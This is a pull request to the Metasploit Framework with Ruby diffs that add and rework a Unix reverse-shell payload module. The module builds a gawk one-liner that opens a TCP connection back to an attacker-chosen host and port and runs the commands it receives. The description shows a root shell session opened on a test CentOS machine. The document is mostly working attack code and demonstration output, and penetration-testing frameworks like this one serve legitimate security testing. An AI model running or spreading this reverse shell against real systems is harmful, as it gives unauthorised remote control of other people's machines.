### PR TITLE
Creates an interactive shell via AWK (reverse)

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -22,7 +22,8 @@ module Metasploit3
 			'Author'        => 
 				[
 					'espreto <robertoespreto[at]gmail.com>',
-					'Ulisses Castro <uss.thebug[at]gmail.com>'
+					'Ulisses Castro <uss.thebug[at]gmail.com>',
+					'Gabriel Quadros <gquadrossilva[at]gmail.com>'
 				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
@@ -30,7 +31,7 @@ module Metasploit3
 			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'awk',
+			'RequiredCmd'   => 'gawk',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -50,7 +51,7 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"awk 'BEGIN{s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";while(1){printf \"shell> \"|& s;s|&getline c;if(c){while((c|& getline)>0){print $0|& s}close(c);}}}'"
+		"awk 'BEGIN{for(s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";s|&getline c;close(c)){while(c|& getline)print $0|& s}}'"
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -1,0 +1,56 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via AWK)',
+			'Description'   => 'Creates an interactive shell via AWK',
+			'Author'        => 
+				[
+					'espreto <robertoespreto[at]gmail.com>',
+					'Ulisses Castro <uss.thebug[at]gmail.com>'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'awk',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		"awk 'BEGIN{s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";while(1){printf \"shell> \"|& s;s|&getline c;if(c){while((c|& getline)>0){print $0|& s}close(c);}}}'"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -19,7 +19,7 @@ module Metasploit3
 		super(merge_info(info,
 			'Name'          => 'Unix Command Shell, Reverse TCP (via AWK)',
 			'Description'   => 'Creates an interactive shell via AWK',
-			'Author'        => 
+			'Author'        =>
 				[
 					'espreto <robertoespreto[at]gmail.com>',
 					'Ulisses Castro <uss.thebug[at]gmail.com>',
@@ -51,7 +51,7 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"awk 'BEGIN{for(s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";s|&getline c;close(c)){while(c|& getline)print $0|& s}}'"
+		"awk 'BEGIN{s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'"
 	end
 
 end


### PR DESCRIPTION
Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description

   LHOST  192.168.0.142    yes       The listen address
   LPORT  8888             yes       The listen port

Exploit target:

   Id  Name

   0   Wildcard Target

msf exploit(handler) > exploit 

[_] Started reverse handler on 192.168.0.142:8888 
[_] Starting the payload handler...
[*] Command shell session 2 opened (192.168.0.142:8888 -> 192.168.0.117:58791) at 2013-05-29 17:50:03 -0300

shell> id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
shell> 

Tested in:
CentOS release 6.4 (Final)
